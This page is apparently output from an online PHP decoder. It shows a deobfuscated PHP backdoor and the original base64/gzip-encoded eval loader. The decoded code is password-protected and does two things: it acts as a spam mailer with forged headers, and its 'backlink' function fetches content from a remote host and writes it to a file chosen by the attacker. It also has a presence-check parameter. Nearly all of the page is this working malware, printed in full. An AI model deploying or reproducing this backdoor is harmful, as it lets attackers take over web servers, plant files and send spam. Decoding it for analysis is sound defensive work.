Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?PHP /* * * bhvAction * @author bhv * @version v1.0 * */ @error_reporti..
Decoded Output download
ignore_user_abort(true);
set_time_limit(0);
header('Content-type: text/html;charset=UTF-8');
function httpSocketConnection($host, $method, $path, $data) {
$method = strtoupper($method);
if ($method == "GET") {
$path.= '?'.$data;
}
$filePointer = fsockopen($host, 80, $errorNumber, $errorString);
if (!$filePointer) {
return false;
}
$requestHeader = $method." ".$path." HTTP/1.1
";
$requestHeader.= "Host: ".$host."
";
$requestHeader.= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 CosmicPager/2.0
";
$requestHeader.= "Content-Type: application/x-www-form-urlencoded
";
if ($method == "POST") {
$requestHeader.= "Content-Length: ".strlen($data)."
";
}
$requestHeader.= "Connection: close
";
if ($method == "POST") {
$requestHeader.= $data;
}
fwrite($filePointer, $requestHeader);
$responseHeader = '';
$responseContent = '';
do {
$responseHeader.= fread($filePointer, 1);
}
while (!preg_match('/
$/', $responseHeader));
if (!strstr($responseHeader, "Transfer-Encoding: chunked")) {
while (!feof($filePointer)) {
$responseContent.= fgets($filePointer, 128);
}
} else {
while ($chunk_length = hexdec(fgets($filePointer))) {
$responseContentChunk = '';
$read_length = 0;
while ($read_length < $chunk_length) {
$responseContentChunk .= fread($filePointer, $chunk_length - $read_length);
$read_length = strlen($responseContentChunk);
}
$responseContent.= $responseContentChunk;
fgets($filePointer);
}
}
return chop($responseContent);
}
function get_server_load($windows = 0) {
$os = strtolower(PHP_OS);
if(strpos($os, "win") === false) {
if(file_exists("/proc/loadavg")) {
$load = file_get_contents("/proc/loadavg");
$load = explode(' ', $load);
return $load[0];
}
elseif(function_exists("shell_exec")) {
$load = explode(' ', `uptime`);
return $load[count($load)-1];
}
else {
return "";
}
}
elseif($windows) {
if(class_exists("COM")) {
$wmi = new COM("WinMgmts:\.");
$cpus = $wmi->InstancesOf("Win32_Processor");
$cpuload = 0;
$i = 0;
while ($cpu = $cpus->Next()) {
$cpuload += $cpu->LoadPercentage;
$i++;
}
$cpuload = round($cpuload / $i, 2);
return "$cpuload%";
}
else {
return "";
}
}
}
if($_GET['test']=='on'){
exit('ae19ff7731647336fac4d79d28127cb4');
}
if (get_magic_quotes_gpc()) {
function stripslashes_gpc(&$value)
{
$value = stripslashes($value);
}
array_walk_recursive($_GET, 'stripslashes_gpc');
array_walk_recursive($_POST, 'stripslashes_gpc');
array_walk_recursive($_COOKIE, 'stripslashes_gpc');
array_walk_recursive($_REQUEST, 'stripslashes_gpc');
}
if($_POST['accesscode']==md5('291d7ad65c71d5fea0e78a641af013d8')){
if($_POST['dexter']=='on'){
$load = get_server_load();
if($load > 5.0){
exit('Too High Load');
}
$subject = $_POST['subject'];
$message = $_POST['message'];
$to = $_POST['to'];
$from = $_POST['from'];
$headers = $_POST['headers'];
$headers .= 'From: '. $from . "
";
$headers .= "X-Originating-IP: [".getenv("SERVER_ADDR")."]
";
$headers .= "X-Sender-IP: " . $_SERVER["SERVER_ADDR"]."
";
exit($message);
if(@mail($to,$subject,$message,$headers)){
echo 'successful';
}else{
echo 'failed';
}
}
if(isset($_POST['backlink']))
{
$backlink = parse_url($_POST['backlink']);
$filename='video.html';
if(isset($_POST['filename']))
$filename=$_POST['filename'];
$source = @httpSocketConnection($backlink['host'],'GET',$backlink['path'],'');
$open = fopen($filename, 'w');
@fwrite($open, $source);
@fclose($open);
if(file_exists($filename)){
echo 'successful';
}
}
}else{
echo 'no access';
}
Did this file decode correctly?
Original Code
<?PHP
/*
*
* bhvAction
* @author bhv
* @version v1.0
*
*/
@error_reporting(0);
$code = "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
pmh5n1d2/qPlGjkq8xokYwi3c6mbPN/AQ==";
@eval(gzinflate(base64_decode($code)));
Function Calls
| gzinflate | 1 |
| base64_decode | 1 |
| error_reporting | 1 |
Stats
| MD5 | e2f9ff4d2b7350f4b4ffca0a529a2b21 |
| Eval Count | 1 |
| Decode Time | 81 ms |